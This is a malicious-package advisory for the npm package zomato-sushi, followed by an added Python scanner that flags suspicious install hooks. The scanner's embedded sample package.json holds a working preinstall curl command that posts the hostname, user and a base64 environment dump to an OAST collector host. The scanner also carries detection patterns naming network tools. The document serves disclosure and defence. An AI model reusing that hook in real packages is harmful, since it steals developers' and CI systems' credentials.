{"id":"MAL-2026-6254","summary":"Malicious code in zomato-sushi (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c)\npackage.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname (`hostname -f`), `whoami`, current working directory, and a base64-encoded dump of the entire process environment (`env | base64 -w0`) over plain HTTP to an Interactsh/OAST out-of-band collector at `d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site`. A preuninstall hook beacons the same host. This fires automatically on `npm install` with no user opt-in. The bulk environment dump captures any secrets present in the shell at install time, including CI tokens, NPM_TOKEN, AWS_* keys, and similar credentials. The package name mimics Zomato's design system namespace and the shipped index.js is a stub with no functionality, consistent with a reconnaissance/credential-capture lure rather than a real library.\n\n## Source: ossf-package-analysis (d19be1ee4f53b1ec4844c228d9522d737756870743ef43a9d00816950b449233)\nThe OpenSSF Package Analysis project identified 'zomato-sushi' @ 1.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package communicates with a domain associated with malicious activity.\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-06-22T18:31:22.938725507Z","published":"2026-06-21T16:11:12Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-21T16:11:12Z","sha256":"d19be1ee4f53b1ec4844c228d9522d737756870743ef43a9d00816950b449233","source":"ossf-package-analysis","versions":["1.0.0"],"import_time":"2026-06-21T16:38:03.002679704Z"},{"modified_time":"2026-06-22T17:42:31Z","sha256":"6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c","source":"amazon-inspector","versions":["1.0.0"],"import_time":"2026-06-22T18:25:28.96204688Z","id":"IN-MAL-2026-007149"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/zomato-sushi/v/1.0.0"}],"affected":[{"package":{"name":"zomato-sushi","ecosystem":"npm","purl":"pkg:npm/zomato-sushi"},"versions":["1.0.0"],"database_specific":{"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/zomato-sushi/MAL-2026-6254.json","indicators":{"evidence_files":[{"sha256":"59733c4859d2b7323d7d5e3512e306c9bb3b27ee3ab73150d7f662efe023d1e9","path":"package.json","tlsh":"a401893679389623bdcc4770bd5a24293c612f4f88352c049b9f222ec28f255237e622"}],"package_integrity":[{"hashes":{"sha1":"7535041b8d1508abb2b3ee1b22e332da992a3546","sha512_sri":"sha512-flCjZerwq7C0NTeufuIWAfWqlzVV+UdBAjpodCWEQ7LA8ddiMn49z5RdFMxKTj8W8S9Asf+fqGRb64P8IA4aGw=="},"filename":"zomato-sushi-1.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}
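The amazon-inspector source above describes the mechanism: an npm lifecycle hook (`preinstall`, with a `preuninstall` beacon) that runs `curl` with `hostname -f`, `whoami`, the working directory and `env | base64 -w0` over plain HTTP to an Interactsh/OAST collector. The following is an added triage script, not part of the OSV record or of any Amazon Inspector or OpenSSF tooling. It parses a `package.json`, looks only at the hooks npm runs without user action, and scores each one on the indicator classes the advisory names (network client, host recon, environment dump, base64 encoding, an OAST-style collector domain, plain HTTP). The embedded `package.json` is constructed from the advisory's description to exercise the scanner; it is not the package's actual script text, and the OAST domain suffix list is an assumption covering common Interactsh and Burp Collaborator defaults, not an exhaustive list.

```python
"""Flag npm lifecycle hooks that look like install-time credential exfiltration.

Added triage example based on the behaviour described in MAL-2026-6254.
Not the advisory's, Amazon Inspector's or OpenSSF's own code.
"""
import json
import re
from typing import Dict, List

# Hooks npm runs automatically on install/uninstall, with no opt-in from the user.
LIFECYCLE_HOOKS = (
    "preinstall", "install", "postinstall",
    "preuninstall", "uninstall", "postuninstall",
    "prepare",
)

# (label, regex, weight). Weights are an assumption chosen so that a bulk
# environment dump or an OAST collector dominates the score.
INDICATORS = [
    ("network_client", re.compile(r"\b(curl|wget|nc|ncat)\b"), 2),
    ("host_recon", re.compile(r"\b(hostname|whoami|id|uname|pwd)\b"), 1),
    ("env_dump", re.compile(r"\benv\b|\bprintenv\b|process\.env"), 3),
    ("encoding", re.compile(r"\bbase64\b"), 1),
    # Assumed OAST suffixes: Interactsh defaults plus Burp Collaborator.
    ("oast_domain", re.compile(
        r"\b[a-z0-9]{20,}\.(oast\.site|oast\.pro|oast\.live|oast\.online|"
        r"oast\.fun|oast\.me|interact\.sh|burpcollaborator\.net|oastify\.com)\b"), 4),
    ("plain_http", re.compile(r"http://"), 1),
]

# Constructed sample modelled on the advisory text; not the real package.json.
SAMPLE_PACKAGE_JSON = r'''{
  "name": "zomato-sushi",
  "version": "1.0.0",
  "main": "index.js",
  "scripts": {
    "preinstall": "curl -s -F \"h=$(hostname -f)\" -F \"u=$(whoami)\" -F \"d=$(pwd)\" -F \"e=$(env | base64 -w0)\" http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ > /dev/null 2>&1 || true",
    "preuninstall": "curl -s http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ > /dev/null 2>&1 || true",
    "test": "echo \"Error: no test specified\" && exit 1"
  }
}'''


def scan_package_json(text: str) -> Dict[str, dict]:
    """Return {hook: {command, indicators, score}} for every lifecycle hook present."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings: Dict[str, dict] = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits: List[str] = [label for label, rx, _ in INDICATORS if rx.search(cmd)]
        score = sum(w for label, _, w in INDICATORS if label in hits)
        findings[hook] = {"command": cmd, "indicators": hits, "score": score}
    return findings


def classify(findings: Dict[str, dict]) -> str:
    """'likely_exfiltration' when one hook both reaches the network and dumps
    the environment or talks to an OAST collector; 'suspicious' for a bare
    network call or collector domain; otherwise 'clean'."""
    verdict = "clean"
    for f in findings.values():
        ind = set(f["indicators"])
        if "network_client" in ind and ind & {"env_dump", "oast_domain"}:
            return "likely_exfiltration"
        if ind & {"network_client", "oast_domain"}:
            verdict = "suspicious"
    return verdict


if __name__ == "__main__":
    report = scan_package_json(SAMPLE_PACKAGE_JSON)
    for hook, f in report.items():
        print(f"{hook}: score={f['score']} indicators={f['indicators']}")
        print(f"    {f['command']}")
    print("verdict:", classify(report))
```

Run it against the `package.json` of a tarball fetched with `npm pack <name>@<version>` before anything is installed, or against `npm view <name>@<version> scripts`; on CI hosts, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops this class of hook from firing at all, which is the control that would have prevented the environment dump described above.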